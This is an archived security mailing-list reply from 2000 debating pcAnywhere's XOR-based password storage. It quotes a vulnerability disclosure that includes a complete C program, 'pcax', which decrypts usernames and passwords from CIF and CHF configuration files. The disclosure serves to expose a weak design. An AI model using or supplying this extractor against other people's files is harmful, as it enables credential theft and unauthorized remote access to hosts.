|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: pcAnywhere weak passwords encryption in configuration files
From: Seth R Arnold (sarnold
WILLAMETTE.EDU)Date: Thu May 04 2000 - 17:48:06 CDT
- Next message: Ron DuFresne: "Re: firewall audit"
- Previous message: Granquist, Lamont: "Re: ethernet cards & promisc mode"
- In reply to: Pascal Longpre: "pcAnywhere weak passwords encryption in configuration files"
- Reply: Seth R Arnold: "Re: pcAnywhere weak passwords encryption in configuration files"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Pascal, it could be that where the passwords are being used, XOR
is as strong as is possible -- if the passwords are being saved
as a convenience for the client, then any way they store the
password is necessarily going to be equivalent to XOR unless
they store the passwords encrypted with a secret known only by
the user -- and if they are being stored as a convenience,
asking the user for a secret isn't going to be convenient.
However, if this is on the server end of things (ie, it
authenticates users) then storing the passwords in a XOR form is
simply poor taste, poor design, and poor security.
Perhaps Symantec could comment to either vuln-dev or bugtraq wrt
how they use their passwords, especially since there seems to be
many in their user community that feel passwords are being
handled insecurely.
* Pascal Longpre <longprepHOTMAIL.COM> [000504 15:32]:
> An other pcAnywhere vulnerability...
>
> --- Discussion ---
> PcAnywhere uses a trivial password encryption scheme (XOR
> based, again!!!) to store account and password information
> in the configuration file. CIF files are used to store
> callers information and CHF files are used to record remote
> slaves information (username,pw and domain) in order to
> automate the process of logging in.
> A second level of protection (protect item password) has
> also been added on those files to protect the viewing of
> properties.
>
> In a network environment, the CIF files are usually stored
> on a centralized file server for easier management and every
> slave must have read access to them. Having access to CIF
> information can give an attacker a way to access any waiting
> pcAnywhere host on that network.
>
> In CHF files, even if you uncheck the "Automatically login
> to host..." option, the first character of every field is
> replaced with a space but the rest of the field's
> information remains in the file.
>
> --- Solution ---
> Symantec suggest the use of the public key encryption
> option. I'm told this is poorly documented. I never saw
> anyone use this. They also suggest using any third party
> encryption software but I don't see how this can fit in a
> network environment.
>
> --- Exploit ---
> The following program will extract the username, password
> and the Protect Item password from any CIF or CHF file. It
> should work fine with versions 7.5 to 9.2.
>
> // pcax - pcAnywhere password extraction program
> // This program extracts account information from CIF and
> CHF files.
> //
> // Written by Pascal Longpre (longprephotmail.com)
> // Date : April 27th, 2000
> // Tested on pcAnywhere version 7.5 to 9.2
>
> #include <windows.h>
> #include <stdio.h>
>
> void main(int argc, char **argv) {
>
> char szBuffer[3072];
> char UserName[32],Password[16],Pw2[16];
> int i, BytesRead;
> FILE *stream;
>
> printf("pcax - pcAnywhere password extractor\n");
> printf("Written by Pascal Longpre - longprephotmail.com
> \n");
> printf("\n");
> if (!argv[1]) {
> printf("USAGE : pcax filename\n");
> printf(" where filename is any .cif or .chf
> file\n");
> printf("\n");
> exit(1);
> }
>
> // Open the file in binary mode
> stream=fopen( argv[1], "r+b" );
> BytesRead= fread(szBuffer, 1, 3072, stream);
> fclose(stream);
>
> // Extract CIF file account information
> if (strstr(argv[1],".cif")>0 || strstr(argv[1],".CIF")>0)
> {
> for (i=0; i<32; i++)
> UserName[i]= szBuffer[0x1cc +i-1] ^ szBuffer[0x1cc+i]
> ^ (0xF+i);
> printf("Username :%s\n",UserName);
>
> for (i=0; i<16; i++)
> Password[i]= szBuffer[0x24d + i - 1] ^ szBuffer[0x24d
> + i] ^ (0x90+i);
> printf("User password :%s\n",Password);
> }
>
> // Extract CHF files account information
> if (strstr(argv[1],".chf")>0 || strstr(argv[1],".CHF")>0)
> {
> for (i=0; i<32; i++)
> UserName[i]= szBuffer[0x82d+i-1] ^ szBuffer[0x82d+i] ^
> (0x70+i);
> printf("Username :% s\n",UserName);
>
> for (i=1; i<15; i++)
> Password[i-1]= szBuffer[0x8ad+i-1] ^ szBuffer[0x8ad+i]
> ^ (0xf0+i);
> printf("Password :%s\n",Password);
> }
>
>
> // Protected item password - Same offset for both files
> for (i=0; i<16; i++)
> Pw2[i]= szBuffer[0x118 + i - 1] ^ szBuffer[0x118 + i] ^
> (0x17+i);
> Pw2[15]='\0';
> printf("Protected item password :%s\n",Pw2);
> }
> // The end
>
> Thanks to Justin Somaini (reillyspeakeasy.org) for giving
> me the idea to investigate those config. files.
>
> Pascal Longpre (longprephotmail.com)
-- Seth Arnold | http://www.willamette.edu/~sarnold/ Hate spam? See http://maps.vix.com/rbl/ for help 'Netscape engineers are weenies!' -- Microsoft
- Next message: Ron DuFresne: "Re: firewall audit"
- Previous message: Granquist, Lamont: "Re: ethernet cards & promisc mode"
- In reply to: Pascal Longpre: "pcAnywhere weak passwords encryption in configuration files"
- Reply: Seth R Arnold: "Re: pcAnywhere weak passwords encryption in configuration files"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]